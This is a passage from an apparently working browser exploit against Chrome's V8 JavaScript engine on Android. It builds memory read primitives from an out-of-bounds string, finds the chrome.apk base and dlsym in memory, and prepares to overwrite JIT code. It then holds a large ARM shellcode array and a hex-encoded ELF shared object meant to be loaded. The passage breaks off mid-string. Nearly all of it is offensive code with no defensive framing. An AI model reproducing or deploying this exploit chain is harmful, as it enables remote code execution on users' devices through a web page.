0x00000000 0x00000000\r\n */\r\n//overwrite huge string as array buffer\r\nvar abLengthIndex = oobStr.indexOf(magicStr);\r\nvar strArrayBuffer = oobStr.substr(abLengthIndex-12,32);\r\n//replace the byteLength\r\nvar LengthAddr = getObjAddr(lengthInOldSpace);\r\nvar strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24);\r\nvar strBase = \"\\x00\\x00\\x00\\x00\";\r\nstrArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12);\r\nstrArrayBuffer = myencode(strArrayBuffer);\r\nfor(var i=0;i<strArrayBuffer.length/8;i++){\r\n var d = strArrayBuffer.substr(i*8,8);\r\n dArray[index/8+i] = str_to_double(d);\r\n}\r\n \r\nvar classStrAddr = getObjAddr(classStr)>>>0;\r\n//set read position\r\nvar readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head\r\n//length control the length of unscaped string, generated string has 12 bytes head\r\n//left 0x1000*2 bytes to avoid gc\r\nvar subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000);\r\n \r\n//save the the chunk head to be corrupted\r\nvar nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12;\r\nvar savedThunkStr = oobStr.substr(nextThunkOffset,0x8100);\r\nfor(var i =0;i<savedThunkStr.length;i++){\r\n savedChunk[i] = savedThunkStr.charCodeAt(i);\r\n}\r\n \r\nvar pos1=new String;\r\nvar pos1addr = getObj24BitsAddr(pos1)-1;\r\n \r\n//0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray \r\nocculen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff);\r\n//minus the length of double array\r\nif(occulen<0x40000+16+8)\r\n throw \"no enough room\";\r\nocculen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray\r\nif(occulen%4!==0)\r\n throw \"length don't align\";\r\nvar arrocc=new Array((occulen/4)); \r\n//set unescape write position\r\nvar occDoubleArray = dArray.concat();\r\n \r\nvar b=unescape(subOobStr);\r\n//restore the corrupted chunk head\r\nvar u8 = new Uint8Array(selectedStr,nextTrunk,0x8100);\r\nfor(var i=0;i<savedChunk.length;i++){\r\n u8[i] = savedChunk[i];\r\n}\r\n \r\nprint(\"long string allocated at \"+classStrAddr.toString(16));\r\nif(typeof(selectedStr)===\"string\"){\r\n print(\"overwrite failed\");\r\n postMessage(false);\r\n close();\r\n return;\r\n //throw \"overwrite failed\";\r\n}\r\nvar fakeab = selectedStr;\r\nprint(\"faked array buffer byte length is \"+fakeab.byteLength.toString(16));\r\nvar globaldv = new Uint32Array(fakeab);\r\n \r\nfunction read_uint32(from_address){\r\n var u32 = globaldv[(from_address/4)>>>0];\r\n return u32>>>0;\r\n}\r\n \r\n \r\nfunction read_uint8(from_address){\r\n from_address = from_address>>>0;\r\n var index = (from_address/4)>>>0;\r\n var mask = from_address%4;\r\n var u32 = globaldv[index];\r\n u32 = u32<<8*(3-mask);\r\n return u32>>>24;\r\n}\r\n \r\nfunction read_uint32_unalign(from_address){\r\n var u32 = 0;\r\n for(var i=3;i>=0;i--){\r\n var u8 = read_uint8(from_address+i);\r\n u32 = u32*0x100+u8;\r\n }\r\n return u32>>>0;\r\n}\r\n \r\n//rw to execute\r\n//get function point of v8::internal::Accessors::ReconfigureToDataProperty\r\nfunction getFixedFunctionPoint(fakeab){\r\n var FunctionAddress = getObjAddr(Function);\r\n var u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000);\r\n var map = u32[0];\r\n u32 = new Uint32Array(fakeab,map-1,0x1000);\r\n //instance descriptors\r\n var descriptors = u32[7];\r\n u32 = new Uint32Array(fakeab,descriptors-1,0x1000);\r\n var lengthAccessorInfo = u32[6];\r\n u32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000);\r\n var setterForeign = u32[4];\r\n u32 = new Uint32Array(fakeab,setterForeign-1,0x1000);\r\n var functionPoint = u32[1];\r\n return functionPoint-1;\r\n}\r\n \r\nvar funPoint = getFixedFunctionPoint(fakeab);\r\nprint(\"ReconfigureToDataProperty at\"+funPoint.toString(16));\r\nvar pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval\r\n \r\nvar point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000\r\nprint(\"chrome.apk base at \"+point.toString(16));\r\n \r\nfunction find(startAddr,len,pattern){\r\n for(var i=0; i<(len-pattern.length); i++ ) {\r\n for(var j=0;j<pattern.length;j++){\r\n var temp = read_uint8(startAddr+i+j);\r\n //print(temp.toString(16));\r\n if(temp!=pattern[j]) break;\r\n }\r\n if(j==pattern.length) return startAddr+i;\r\n }\r\n print(\"find failed\");\r\n}\r\nvar pattern_position=find(point,0x10000000,pattern);\r\n \r\nprint(\"find pattern at \"+to_hex(pattern_position));\r\n \r\n \r\n \r\n \r\n \r\nfunction get_dest_from_blx(addr) {\r\n var val = read_uint32_unalign(addr);\r\n var s = (val & 0x400) >> 10;\r\n var i1 = 1 - (((val & 0x20000000) >> 29) ^ s);\r\n var i2 = 1 - (((val & 0x8000000) >> 27) ^ s);\r\n var i10h = val & 0x3ff;\r\n var i10l = (val & 0x7fe0000) >> 17;\r\n var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2);\r\n return ((addr + 4) & ~3) + off;\r\n}\r\n \r\nfunction backup_original_code(start_address){\r\n var backup_arr = [];\r\n set_access_address(start_address);\r\n var u8arr=new Uint8Array(faked_ab);\r\n for(var i=0;i<shellcode.length+4096;i++){\r\n backup_arr[i]=u8arr[i];\r\n }\r\n return backup_arr;\r\n}\r\n \r\nfunction restore_original_code(start_address,backup_arr){\r\n set_access_address(start_address);\r\n var u8arr=new Uint8Array(faked_ab);\r\n for(var i=0;i<shellcode.length+4096;i++){\r\n u8arr[i]=backup_arr[i];\r\n }\r\n}\r\n \r\n \r\nhuge_func({});\r\nprint(\"blx instruction content is \"+to_hex(read_uint32_unalign(pattern_position-4)));\r\nvar dlsym_addr = get_dest_from_blx(pattern_position-4);\r\nprint(\"dlsym address is \"+to_hex(dlsym_addr));\r\nvar huge_func_address = getObjAddr(huge_func)-1;\r\nprint(\"huge func address is \"+to_hex(huge_func_address));\r\nfor(var i=0;i<20;i++){\r\n print(to_hex(read_uint32(huge_func_address+i*4)));\r\n}\r\nvar huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4\r\nprint(\"huge func code entry is \"+to_hex(huge_func_code_entry));\r\nprint(to_hex(read_uint32(huge_func_code_entry)));\r\n \r\n//var so_str= \"\";\r\nvar shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe5,0x1e,0xb1,0xcd,0xe5,0x6d,0xb0,0xa0,0xe3,0x13,0x81,0xcd,0xe5,0x21,0x81,0xcd,0xe5,0x22,0x71,0xcd,0xe5,0x23,0x91,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x63,0x30,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x14,0x00,0x8d,0xe5,0x73,0xe0,0xa0,0xe3,0x68,0x10,0x8d,0xe2,0x6a,0x60,0xcd,0xe5,0x6d,0x20,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x68,0xe0,0xcd,0xe5,0x10,0x00,0x9d,0xe5,0x6b,0x30,0xcd,0xe5,0x6c,0xb0,0xcd,0xe5,0x69,0x70,0xcd,0xe5,0x6e,0x90,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x20,0xc0,0x95,0xe5,0xb0,0x90,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0xb2,0xe3,0xd5,0xe1,0x25,0x10,0xa0,0xe3,0x2c,0x30,0xa0,0xe3,0xa9,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa8,0x10,0xcd,0xe5,0x0c,0xc0,0x85,0xe0,0xab,0x10,0xcd,0xe5,0x0e,0xe1,0x8e,0xe0,0xae,0x10,0xcd,0xe5,0x02,0x10,0x8d,0xe0,0x20,0xc0,0x8d,0xe5,0x20,0xc0,0x95,0xe5,0xac,0x20,0xcd,0xe5,0xaf,0x20,0xcd,0xe5,0xa8,0x20,0x8d,0xe2,0xaa,0x30,0xcd,0xe5,0x8e,0xe1,0x8c,0xe0,0xad,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x05,0xc0,0x8e,0xe0,0x10,0xe0,0x9c,0xe5,0x00,0xc0,0x8d,0xe5,0x0e,0xc0,0x85,0xe0,0x24,0xc0,0x8d,0xe5,0x04,0xc0,0x8d,0xe5,0x14,0xc0,0x9d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0xe0,0xa0,0xe3,0x6d,0x00,0xa0,0xe3,0x89,0xa0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x2e,0x30,0xa0,0xe3,0x91,0xa0,0xcd,0xe5,0x79,0x20,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x8c,0xe0,0xcd,0xe5,0x8e,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x94,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x51,0xc0,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x96,0x60,0xcd,0xe5,0x52,0xe0,0xcd,0xe5,0x5f,0xe0,0xa0,0xe3,0xb5,0x60,0xcd,0xe5,0xb7,0x00,0xcd,0xe5,0xb9,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xba,0x00,0xcd,0xe5,0xc1,0x60,0xcd,0xe5,0x8b,0x80,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x93,0x80,0xcd,0xe5,0x95,0x70,0xcd,0xe5,0x97,0x90,0xcd,0xe5,0x53,0x70,0xcd,0xe5,0x54,0x90,0xcd,0xe5,0xbb,0x70,0xcd,0xe5,0xbc,0x90,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x90,0x30,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0xb4,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xc0,0x30,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x8d,0x20,0xcd,0xe5,0x92,0x20,0xcd,0xe5,0xb6,0x10,0xcd,0xe5,0xc2,0x10,0xcd,0xe5,0xc3,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xd1,0xe0,0xcd,0xe5,0x61,0xe0,0xa0,0xe3,0xc5,0xa0,0xcd,0xe5,0xd3,0x60,0xcd,0xe5,0xd4,0x60,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xd9,0xa0,0xcd,0xe5,0x6c,0xa0,0xa0,0xe3,0xde,0x60,0xcd,0xe5,0xe2,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc4,0x30,0xcd,0xe5,0xc6,0x20,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xc8,0x90,0xcd,0xe5,0xcc,0x30,0xcd,0xe5,0xcd,0xc0,0xcd,0xe5,0xce,0x80,0xcd,0xe5,0xcf,0xc0,0xcd,0xe5,0xd0,0x70,0xcd,0xe5,0xd2,0xe0,0xcd,0xe5,0xd5,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd7,0x90,0xcd,0xe5,0xd8,0x30,0xcd,0xe5,0xda,0xe0,0xcd,0xe5,0xdb,0x70,0xcd,0xe5,0xdc,0xe0,0xcd,0xe5,0xdd,0x30,0xcd,0xe5,0xdf,0x10,0xcd,0xe5,0xe0,0xa0,0xcd,0xe5,0xe1,0x30,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0xe4,0x90,0xcd,0xe5,0xa6,0x00,0x00,0x0a,0xcc,0xa0,0x8d,0xe2,0xd8,0x60,0x8d,0xe2,0x20,0x70,0x9d,0xe5,0x88,0x20,0x8d,0xe2,0x90,0x30,0x8d,0xe2,0x20,0x90,0x8d,0xe5,0x2c,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0x50,0x00,0x8d,0xe2,0xb4,0xc0,0x8d,0xe2,0xc0,0xe0,0x8d,0xe2,0x40,0xa0,0x8d,0xe5,0x48,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x24,0x60,0x9d,0xe5,0x44,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x28,0xc0,0x8d,0xe5,0x3c,0xe0,0x8d,0xe5,0x4c,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x2c,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x50,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x44,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xcc,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0x13,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x01,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x4c,0x40,0x9d,0xe5,0x44,0x90,0x9d,0xe5,0x24,0xa0,0x9d,0xe5,0x20,0x20,0x9d,0xe5,0x2c,0x30,0x9d,0xe5,0x20,0xc0,0x9d,0xe5,0x14,0xe0,0x92,0xe5,0x10,0x10,0x93,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9c,0xe5,0xae,0x21,0xb0,0xe1,0x01,0x70,0x85,0xe0,0x03,0xe0,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x80,0xa0,0xe3,0x24,0xb0,0x8d,0xe5,0x1c,0xb0,0x9d,0xe5,0x1c,0x90,0x8d,0xe5,0x08,0x90,0xa0,0xe1,0x20,0x80,0x9d,0xe5,0x20,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x0e,0x60,0xa0,0xe1,0x14,0x50,0x8d,0xe5,0x04,0x20,0x9a,0xe5,0x01,0x90,0x89,0xe2,0x08,0xa0,0x8a,0xe2,0x08,0x50,0x1a,0xe5,0x10,0x00,0x9d,0xe5,0x52,0xe4,0xef,0xe7,0x0e,0x12,0x96,0xe7,0x01,0x10,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x05,0x00,0x84,0xe7,0x14,0x30,0x98,0xe5,0xa3,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x50,0x9d,0xe5,0x06,0xe0,0xa0,0xe1,0x24,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x20,0xa0,0x9d,0xe5,0x14,0xc0,0x99,0xe5,0x10,0x20,0x99,0xe5,0xac,0x11,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x02,0x50,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x30,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x05,0xc0,0xb3,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x93,0xe5,0x52,0x34,0xef,0xe7,0x03,0x22,0x8e,0xe0,0x04,0x30,0x92,0xe5,0x04,0x20,0x83,0xe0,0x04,0x20,0x8c,0xe7,0x14,0xc0,0x99,0xe5,0xac,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x2b,0x1b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x20,0x1b,0x8d,0xed,0x0e,0x80,0xa0,0x11,0x00,0x60,0xa0,0x13,0x80,0x50,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x90,0x9a,0xe5,0x10,0x80,0x88,0xe2,0x29,0x02,0x56,0xe1,0x09,0x00,0x00,0x2a,0x00,0xe0,0x98,0xe5,0x05,0x10,0xa0,0xe1,0x01,0x60,0x86,0xe2,0x0e,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x98,0xe5,0x07,0x40,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x4c,0x0c,0xe3,0x14,0x48,0xdf,0xe7,0x18,0xb0,0x9d,0xe5,0x70,0x10,0x8d,0xe2,0xe8,0x20,0x8d,0xe2,0x30,0x50,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x0c,0xa0,0x9b,0xe5,0x08,0x30,0x9b,0xe5,0x00,0xa0,0x8d,0xe5,0x35,0xff,0x2f,0xe1,0x18,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x4b,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x00,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x2c,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x30,0xa0,0xe1,0x98,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,];\r\nvar so_str = \"7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e2003093e51c209de50c2082e200208de50600a0e380209fe502208fe00210a0e178209fe502208fe015ffffeb08309de51c209de5002083e564309fe503308fe0003093e5013083e20